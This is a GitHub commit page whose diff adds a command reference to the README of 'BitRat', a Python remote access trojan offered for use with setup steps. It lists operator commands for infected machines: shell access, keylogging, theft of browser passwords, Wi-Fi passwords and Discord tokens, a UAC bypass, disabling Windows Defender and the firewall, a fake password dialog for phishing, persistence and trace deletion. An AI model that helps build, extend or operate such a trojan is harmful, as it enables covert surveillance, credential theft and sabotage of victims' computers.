Skip to content

Commit 25f6113

Browse files
author
DaniDuese
authored
Information
1 parent 4157e33 commit 25f6113

File tree

1 file changed

+64
-0
lines changed

1 file changed

+64
-0
lines changed

README.md

Lines changed: 64 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -9,6 +9,70 @@ Python script to create a Rat stealing tokens, etc.
99
3. Run the setup.bat file to install all the libraries automatically or install all the required libraries yourself
1010
4. Run the BitRat.py file
1111

12+
# Commands
13+
14+
- !message = Show a message box displaying your text / Syntax = "!message example"
15+
- !shell = Execute a shell command /Syntax = "!shell whoami"
16+
- !windowstart = Start logging current user window (logging is shown in the bot activity)
17+
- !windowstop = Stop logging current user window
18+
- !voice = Make a voice say outloud a custom sentence / Syntax = "!voice test"
19+
- !admincheck = Check if program has admin privileges
20+
- !sysinfo = Gives info about infected computer
21+
- !history = Get chrome browser history
22+
- !download = Download a file from infected computer
23+
- !upload = Upload file to the infected computer / Syntax = "!upload file.png" (with attachment)
24+
- !cd = Changes directory
25+
- !delete = deletes a file / Syntax = "!delete /path to/the/file.txt"
26+
- !write = Type your desired sentence on computer / Type "enter" to press the enter button on the computer
27+
- !wallpaper = Change infected computer wallpaper / Syntax = "!wallpaper" (with attachment)
28+
- !clipboard = Retrieve infected computer clipboard content
29+
- !geolocate = Geolocate computer using latitude and longitude of the ip adress with google map / Warning : Geolocating IP adresses is not very precise
30+
- !startkeylogger = Starts a keylogger
31+
- !stopkeylogger = Stops keylogger
32+
- !dumpkeylogger = Dumps the keylog
33+
- !volumemax = Put volume to max
34+
- !volumezero = Put volume at 0
35+
- !idletime = Get the idle time of user's on target computer
36+
- !listprocess = Get all process
37+
- !blockinput = Blocks user's keyboard and mouse / Warning : Admin rights are required
38+
- !unblockinput = Unblocks user's keyboard and mouse / Warning : Admin rights are required
39+
- !screenshot = Get the screenshot of the user's current screen
40+
- !exit = Exit program
41+
- !kill = Kill a session or all sessions / Syntax = "!kill session-3" or "!kill all"
42+
- !uacbypass = attempt to bypass uac to gain admin by using fod helper
43+
- !passwords = grab all passwords
44+
- !streamscreen = stream screen by sending multiple pictures
45+
- !stopscreen = stop screen stream
46+
- !shutdown = shutdown computer
47+
- !restart = restart computer
48+
- !logoff = log off current user
49+
- !bluescreen = BlueScreen PC
50+
- !displaydir = display all items in current dir
51+
- !currentdir = display the current dir
52+
- !dateandtime = display system date and time
53+
- !prockill = kill a process by name / syntax = "!kill process.exe"
54+
- !recscreen = record screen for certain amount of time / syntax = "!recscreen 10"
55+
- !recaudio = record audio for certain amount of time / syntax = "!recaudio 10"
56+
- !disableantivirus = permanently disable windows defender(requires admin)
57+
- !disablefirewall = disable windows firewall (requires admin)
58+
- !audio = play a audio file on the target computer(.wav only) / Syntax = "!audio" (with attachment)
59+
- !selfdestruct = delete all traces that this program was on the target PC
60+
- !windowspass = attempt to phish password by poping up a password dialog
61+
- !displayoff = turn off the monitor(Admin rights are required)
62+
- !displayon = turn on the monitors(Admin rights are required)
63+
- !hide = hide the file by changing the attribute to hidden
64+
- !unhide = unhide the file the removing the attribute to make it unhidden
65+
- !ejectcd = eject the cd drive on computer
66+
- !retractcd = retract the cd drive on the computer
67+
- !critproc = make program a critical process. meaning if its closed the computer will bluescreen(Admin rights are required)
68+
- !uncritproc = if the process is a critical process it will no longer be a critical process meaning it can be closed without bluescreening(Admin rights are required)
69+
- !website = open a website on the infected computer / syntax = "!website google.com" or "!website www.google.com"
70+
- !distaskmgr = disable task manager(Admin rights are required)
71+
- !enbtaskmgr = enable task manager(if disabled)(Admin rights are required)
72+
- !getwifipass = get all the wifi passwords on the current device(Admin rights are required)
73+
- !startup = add file to startup(when computer go on this file starts)(Admin rights are required)
74+
- !getdiscordtokens = get discord token ONLY! (also decrypts them)
75+
1276
# Achievements
1377

1478
- 20 Stars - Realease .exe file

0 commit comments

Comments
 (0)